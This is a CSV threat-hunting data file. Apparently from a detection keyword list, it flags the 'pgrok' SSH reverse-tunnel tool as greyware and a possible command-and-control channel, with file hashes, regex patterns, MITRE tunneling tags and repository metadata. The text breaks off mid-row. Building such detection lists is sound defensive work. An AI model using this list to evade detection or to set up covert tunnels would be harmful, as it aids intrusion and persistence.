"*7ffdce15d8adc97dcaaa845d3e7f493b9750103f4e0e6a3e5281109d93272374*",".{0,1000}7ffdce15d8adc97dcaaa845d3e7f493b9750103f4e0e6a3e5281109d93272374.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*81e16f20ad480d901964c4b9bfc2f0321a4693cb123f4d3148277bd9f7bc3f5d*",".{0,1000}81e16f20ad480d901964c4b9bfc2f0321a4693cb123f4d3148277bd9f7bc3f5d.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*8513ddc466aa21460a7790754d7f9441725820996f68ae44731bd63fb8abd957*",".{0,1000}8513ddc466aa21460a7790754d7f9441725820996f68ae44731bd63fb8abd957.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*8572bd593860c780a609128b9764e2f98e13ebf7130018e288f067bc75c71ef3*",".{0,1000}8572bd593860c780a609128b9764e2f98e13ebf7130018e288f067bc75c71ef3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*869076f7f55c9cecc46bcef4b7c44a7538f2af695ff8ce728c71a0d52c48443b*",".{0,1000}869076f7f55c9cecc46bcef4b7c44a7538f2af695ff8ce728c71a0d52c48443b.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*89c0d3180d1baa0b0ca6fb7dd3af81a80400ea4c5674101a5800c074bd3aec98*",".{0,1000}89c0d3180d1baa0b0ca6fb7dd3af81a80400ea4c5674101a5800c074bd3aec98.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*8c3d91b1b0f23fa6998de41c1f4c12eab9f14e39fc224d3055477fbdf0c8a7aa*",".{0,1000}8c3d91b1b0f23fa6998de41c1f4c12eab9f14e39fc224d3055477fbdf0c8a7aa.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*8d2162fe492d7be3c17eb6578d8fcdedaeffe2294156a3f898f0cdb1fb6c10a8*",".{0,1000}8d2162fe492d7be3c17eb6578d8fcdedaeffe2294156a3f898f0cdb1fb6c10a8.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*92ba52da6b5b623559117809305a93ee9ad6da07ea6352efec349e8d2760d307*",".{0,1000}92ba52da6b5b623559117809305a93ee9ad6da07ea6352efec349e8d2760d307.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*9827e63054ddec1ffe0f246f9bb0c0de0d30deac2055481b44304d13cc928fe2*",".{0,1000}9827e63054ddec1ffe0f246f9bb0c0de0d30deac2055481b44304d13cc928fe2.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*99e0f20ad43baaff5a1a38d9bb0e98a2b2269b8fc6ac3c3ff6fb70b802fb6911*",".{0,1000}99e0f20ad43baaff5a1a38d9bb0e98a2b2269b8fc6ac3c3ff6fb70b802fb6911.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*9b6ebca62874fff570d19b1d7eeee8eca39f0e9fe1c5496930413527fceaf85a*",".{0,1000}9b6ebca62874fff570d19b1d7eeee8eca39f0e9fe1c5496930413527fceaf85a.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*9c86d0fbe739883dc37c81ff6a9e4fa7f06417c56fa52ad6ceb6ba7bc3e9f420*",".{0,1000}9c86d0fbe739883dc37c81ff6a9e4fa7f06417c56fa52ad6ceb6ba7bc3e9f420.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*9dd63128c55bdc6f062713958960f7bdec1983051df3114d9cfc2037089686c3*",".{0,1000}9dd63128c55bdc6f062713958960f7bdec1983051df3114d9cfc2037089686c3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*9f6ee8fe7fea7bb68fed2ca7626a9277af8990ff8ee565c03ca3eecc083717df*",".{0,1000}9f6ee8fe7fea7bb68fed2ca7626a9277af8990ff8ee565c03ca3eecc083717df.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*a2551565a931107db6e9ed883c7252bcfb51b185f95d598cffc30dc7997c4d61*",".{0,1000}a2551565a931107db6e9ed883c7252bcfb51b185f95d598cffc30dc7997c4d61.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*a2e65bd4579385605e7233852bea4627cf94a2ee83e6233d462740b7e930c284*",".{0,1000}a2e65bd4579385605e7233852bea4627cf94a2ee83e6233d462740b7e930c284.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*a483e9f06a8e03c3a09028279f8a03380dfc41c5ee85327763e684c866f9019f*",".{0,1000}a483e9f06a8e03c3a09028279f8a03380dfc41c5ee85327763e684c866f9019f.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*a8a01db928e625521789fb4187b72857049ea2542d1795afbe581ed6d77e6bc1*",".{0,1000}a8a01db928e625521789fb4187b72857049ea2542d1795afbe581ed6d77e6bc1.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*a8ab4a99f65193c1bba3f8864a0f1d39e8d7c97843b4ac0fbacc98fe1d2ec161*",".{0,1000}a8ab4a99f65193c1bba3f8864a0f1d39e8d7c97843b4ac0fbacc98fe1d2ec161.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*a8effdadf86dd52ed13ab8051982927ea464500c36b4d0c1fff5158da2b4abed*",".{0,1000}a8effdadf86dd52ed13ab8051982927ea464500c36b4d0c1fff5158da2b4abed.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*a920c6b7605a82318a7f60f4a2bcab191359f6187983bbb82e56a6fe2cd7418d*",".{0,1000}a920c6b7605a82318a7f60f4a2bcab191359f6187983bbb82e56a6fe2cd7418d.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*application_name='pgrokd'*",".{0,1000}application_name\=\'pgrokd\'.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*b1ce529f2a0ff157590b2607388d425ac9a0d076de7f58bb6ee7c14bdb657bd7*",".{0,1000}b1ce529f2a0ff157590b2607388d425ac9a0d076de7f58bb6ee7c14bdb657bd7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*b668e7abef3da11ad164c618aff533f225d96fa046034e64485a48eaf5fdaf58*",".{0,1000}b668e7abef3da11ad164c618aff533f225d96fa046034e64485a48eaf5fdaf58.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP 
reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*b7efb92268e1e7897c0844e0a0f6c8648173a3c5c2c51d46fa5677b6c58c1dcd*",".{0,1000}b7efb92268e1e7897c0844e0a0f6c8648173a3c5c2c51d46fa5677b6c58c1dcd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*b8714bdc54a797d35052db4d241bf2c5ca1dbd0f0ab549711ccdd0b54b4d1d55*",".{0,1000}b8714bdc54a797d35052db4d241bf2c5ca1dbd0f0ab549711ccdd0b54b4d1d55.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*b886f3afc9b5d11dcf8741b00aff8c1f43f1007554ac58f949c7654df0566fed*",".{0,1000}b886f3afc9b5d11dcf8741b00aff8c1f43f1007554ac58f949c7654df0566fed.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*b9488c840679a25f1afc5666025727d823751107550249b8b28fdda43cf270d2*",".{0,1000}b9488c840679a25f1afc5666025727d823751107550249b8b28fdda43cf270d2.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*ba9ae74a938a83efcaee904b800d7bff0b19e02f632c4956bd0361e6a32f4ef3*",".{0,1000}ba9ae74a938a83efcaee904b800d7bff0b19e02f632c4956bd0361e6a32f4ef3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*bdb7525b0af0c8528ee5811393f46ca0905eea38ec615ba68bf86f9d358e9c11*",".{0,1000}bdb7525b0af0c8528ee5811393f46ca0905eea38ec615ba68bf86f9d358e9c11.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*c54778b8dc4e458130197cf95d6fc594cc1b016b70eea917f8a44c2c37c080c7*",".{0,1000}c54778b8dc4e458130197cf95d6fc594cc1b016b70eea917f8a44c2c37c080c7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*c6df3acfa4964ce75534e76ea4635280be68c946b8b5d0566a858337e74d5fd3*",".{0,1000}c6df3acfa4964ce75534e76ea4635280be68c946b8b5d0566a858337e74d5fd3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*cbab130e55af45dd1cc7b1644a799b92f7fa4b04f82b93e021e182399b8aefec*",".{0,1000}cbab130e55af45dd1cc7b1644a799b92f7fa4b04f82b93e021e182399b8aefec.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*cd23ba3117eb39491f3286532575c3ccce97f0445e18352c87799a7f82274c10*",".{0,1000}cd23ba3117eb39491f3286532575c3ccce97f0445e18352c87799a7f82274c10.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*cd5b16213c11faffa7ed44becec55368348013aa980e6a38f85f7f2a0aa2b85e*",".{0,1000}cd5b16213c11faffa7ed44becec55368348013aa980e6a38f85f7f2a0aa2b85e.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*cec943f322857887bed2af7cf0aacb4052dcdb63eb76180f6a2022e3e4133718*",".{0,1000}cec943f322857887bed2af7cf0aacb4052dcdb63eb76180f6a2022e3e4133718.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*cf2a0ea978a7f5a254a046155a39127ae68701a7b4ec51dd2e509b9f217e960f*",".{0,1000}cf2a0ea978a7f5a254a046155a39127ae68701a7b4ec51dd2e509b9f217e960f.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*d0e4117d84d8a5e8a716a6cf6f06128a365465eb83e803a85ecd9ab2671468b4*",".{0,1000}d0e4117d84d8a5e8a716a6cf6f06128a365465eb83e803a85ecd9ab2671468b4.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*d110395a75afff8f1e8c54c7ae5fbd9e085ec21da4c472e4fb11346c17d8652d*",".{0,1000}d110395a75afff8f1e8c54c7ae5fbd9e085ec21da4c472e4fb11346c17d8652d.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*d273dcfbaab605187495a344d65d3a39f423144bf005a36bee87c292ab202c69*",".{0,1000}d273dcfbaab605187495a344d65d3a39f423144bf005a36bee87c292ab202c69.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*d6541e6233d5baf5190b494f434dcf30943c33d4bb78266cac230eb905a10f50*",".{0,1000}d6541e6233d5baf5190b494f434dcf30943c33d4bb78266cac230eb905a10f50.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*d789739fc4f5928ee0cb38a4520f9562562cffb2e3a48ab3cd6ba0c6e8b4cfb5*",".{0,1000}d789739fc4f5928ee0cb38a4520f9562562cffb2e3a48ab3cd6ba0c6e8b4cfb5.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*d8d88c5aecf5f0b27208387cc830fd094e2b0e7230a965728a6862ee9c8278e0*",".{0,1000}d8d88c5aecf5f0b27208387cc830fd094e2b0e7230a965728a6862ee9c8278e0.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*d9473d3695626684a9cae93f417516900fd0f21a03f61e6943f50435c762ac73*",".{0,1000}d9473d3695626684a9cae93f417516900fd0f21a03f61e6943f50435c762ac73.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*da409444f4db4761ccf441e1e9ba8ba39ab8e63bf0dcc8054308aa5e805379d6*",".{0,1000}da409444f4db4761ccf441e1e9ba8ba39ab8e63bf0dcc8054308aa5e805379d6.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*db20e3d1a1eb02a323d1d3abcdd7adfdb71c04965988edb4e75fbe28c03858bc*",".{0,1000}db20e3d1a1eb02a323d1d3abcdd7adfdb71c04965988edb4e75fbe28c03858bc.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*dc8ddf520783dad3b74770b0ad90d0201b090ef858dee7971825b7e45424f799*",".{0,1000}dc8ddf520783dad3b74770b0ad90d0201b090ef858dee7971825b7e45424f799.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*e3bc166f9e3cd64e1eee1061f26cb80347f2cd4997971c91f3ae9cbe5cf35999*",".{0,1000}e3bc166f9e3cd64e1eee1061f26cb80347f2cd4997971c91f3ae9cbe5cf35999.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*ec0b2820e26edffdfbcb1e3e66a78dd1ba830fe37897a3a55bf4602a3e807cef*",".{0,1000}ec0b2820e26edffdfbcb1e3e66a78dd1ba830fe37897a3a55bf4602a3e807cef.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*f4e95340caf77ecf01f0b73c8d2941ff56fcbd908722a827db9bc8931ead693c*",".{0,1000}f4e95340caf77ecf01f0b73c8d2941ff56fcbd908722a827db9bc8931ead693c.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*f6c2a3ad0c251e7a5c109c6a60127c8e90506d8b71e78598c6a449c7f5c24659*",".{0,1000}f6c2a3ad0c251e7a5c109c6a60127c8e90506d8b71e78598c6a449c7f5c24659.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*fb10885853b0c5f6a0cb0bc0e5998c430d99ffcb9a5bda1fd03cefe9f3028f7a*",".{0,1000}fb10885853b0c5f6a0cb0bc0e5998c430d99ffcb9a5bda1fd03cefe9f3028f7a.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*fcc37e68c723df92d2c17ce16d8c703a90a0c2f160eeb84c4559457406bfdf57*",".{0,1000}fcc37e68c723df92d2c17ce16d8c703a90a0c2f160eeb84c4559457406bfdf57.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*ff3ae7ab29ef7a21094e07650e8cd4a4291363c2819e2dfbae34520ec762efd7*",".{0,1000}ff3ae7ab29ef7a21094e07650e8cd4a4291363c2819e2dfbae34520ec762efd7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*http://127.0.0.1:3320/-/healthcheck*",".{0,1000}http\:\/\/127\.0\.0\.1\:3320\/\-\/healthcheck.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*jerson/tap/pgrok*",".{0,1000}jerson\/tap\/pgrok.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*pgrok http *",".{0,1000}pgrok\shttp\s.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - 
